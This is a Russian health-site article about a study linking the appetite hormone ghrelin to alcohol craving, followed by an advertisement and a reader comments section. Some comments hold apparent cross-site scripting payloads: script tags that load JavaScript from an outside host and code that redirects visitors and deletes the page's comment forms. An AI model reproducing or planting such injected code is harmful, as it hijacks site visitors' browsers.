Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Тот, кто худеет неправиль...  >>  Тот, кто худеет неправильно, станет алкоголиком!
 
Обратная связь
 

Тот, кто худеет неправильно, станет алкоголиком!

Размер шрифта
28 мая 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Вы сидите на жесткой диете и постоянно хотите есть? Тогда будьте особенно осторожны с алкоголем. Оказывается, гормон, который ответственен за ваш аппетит, участвует в формировании алкогольной зависимости.

Грелин – это гормон, который вырабатывается в желудке и стимулирует аппетит, а также повышает количество потребляемой пищи. В то же время алкоголь чаще всего воспринимается как психоактивное вещество, которое влияет на функции мозга, но большинство людей забывают о том, что это еще и высококалорийный напиток. Все это, а также данные, полученные в исследованиях на животных, дают все основания полагать, что высокий уровень грелина может стимулировать желание выпить.

Доктор Лоренцо Леджио с коллегами провели эксперимент с участием добровольцев, часто употребляющих спиртное, и обнаружили, что пристрастие к алкоголю возрастает при введении грелина. Результаты этой работы были опубликованы в журнале Biological Psychiatry.

«Это исследование доказывает, что грелин играет важную роль в развитии зависимости от алкоголя», – рассказывает доктор Леджио, который является главой лаборатории психонейроэндокринологии и нейрофармакологии Национального института по изучению алкогольной зависимости.

В эксперименте приняли участие 45 мужчин и женщин. Все они были зависимы от алкоголя и отказывались от лечения. Все участники были случайным образом разделены на три группы, и каждому вводилась одна из трех возможных доз грелина. Одна из доз составляла 0 мкг/кг, то есть, по сути, являлась плацебо. После внутривенного введения препарата участники выполняли ряд тестов, в которых определялось их желание выпить. Также ученые оценивали потребность участников как в алкогольных, так и в безалкогольных напитках. Грелин значительно повышал желание употребить алкогольные напитки и никак не влиял на потребность в безалкогольных. В группах, получавших грелин, и в группе плацебо не было выявлено значимых побочных эффектов.

«Эта работа проливает свет на роль грелина в формировании алкогольной зависимости», – считает доктор Джон Кристал, редактор журнала Biological Psychiatry. «Нам необходимо понять, какие именно нейробиологические пути активирует грелин, а также определить, как можно блокировать его действие. Это поможет нам разработать новые эффективные препараты для использования в лечении алкоголизма», – добавляет доктор Леджио.

Так что не стоит сидеть на жестких диетах, чтобы сбросить вес. Сбалансированное питание и контроль над аппетитом помогут вам не только обрести фигуру мечты, но и легко отказаться от алкогольных напитков.

Если вы хотите реально похудеть, специально для вас создана «Диета Елены Малышевой» – набор готовой еды, который доставят вам домой или в офис. Ешьте и худейте!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

02 июня 2015 в 16:34

Комментарий удален за нарушение Правил общения

2 - Гость

09 июня 2015 в 22:38

Комментарий удален за нарушение Правил общения

3 - zzzzzz

30 июня 2015 в 18:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 21:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:06

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Суперпродукты для похудения   Как есть, что угодно, и не переживать?   Ученые говорят: откажитесь от лишнего веса, но не от картошки!   Как измерить свое тело, чтобы похудеть  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 
26 июля 2011Диеты помогают только молодым 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 

Слайдшоу

1
Супереда для быстрого похудения
Как похудеть быстрее подруги?
Чего не делать, если вы набрали вес?

Тесты

1
Правильно ли вы худеете?
Какое мороженное съесть, чтобы похудеть
Есть ли у вас избыточный вес?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.